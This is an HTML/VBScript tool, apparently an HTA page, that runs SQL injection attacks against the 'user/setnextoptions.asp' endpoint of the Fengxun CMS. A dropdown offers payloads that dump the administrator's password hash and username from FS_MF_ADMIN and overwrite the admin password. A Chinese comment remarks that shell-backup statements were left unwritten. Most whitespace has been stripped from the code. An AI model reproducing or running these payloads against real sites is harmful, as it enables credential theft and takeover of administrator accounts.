<SCRIPTLANGUAGE="VBScript">

SubWindow_onLoad

window.resizeTo450,380

window.moveTo300,300

EndSub

</SCRIPT>

<SCRIPTLANGUAGE="VBScript">

FunctiongetHTTPPage(Path)

t=GetBody(Path)

getHTTPPage=BytesToBstr(t,"GB2312")

document.getElementById("url").innerText=getHTTPPage

EndFunction

</script>

<SCRIPTLANGUAGE="VBScript">

FunctionGetBody(url)

OnErrorResumeNext

SetRetrieval=CreateObject("Microsoft.XMLHTTP")

WithRetrieval

.Open"Get",url,False,"",""

.Send

GetBody=.ResponseBody

EndWith

SetRetrieval=Nothing

EndFunction

FunctionBytesToBstr(Body,Cset)

Dimobjstream

Setobjstream=CreateObject("adodb.stream")

objstream.Type=1

objstream.Mode=3

objstream.Open

objstream.WriteBody

objstream.Position=0

objstream.Type=2

objstream.Charset=Cset

BytesToBstr=objstream.ReadText

objstream.Close

Setobjstream=Nothing

EndFunction

</script>

<title>bylcx</title>

<inputid="urlcode"NAME="urlcode"size="60"value="http://风讯url/user/setnextoptions.asp">

<selectid="sql"name="sql"onchange=vbs:getHTTPPage(document.getElementById("urlcode").value+document.getElementById("sql").value)>

<optionvalue="">风讯sql版注入，至于其它备份shell的语句懒得写了</option>

<optionvalue="?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=1--")">暴管理员密码</option>

<optionvalue="?EquValue=1&ReqSql=select%201,Admin_Name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=1--")">暴管理员用户名</option>

<optionvalue="?EquValue=1&ReqSql=selectuser;updateFS_MF_ADMINsetADMIN_pass_word='a0b923820dcc509a'whereid=1--">更改管理员密码为1</option>

</select>

<TEXTAREAid="url"NAME="url"ROWS="8"COLS="60"></TEXTAREA>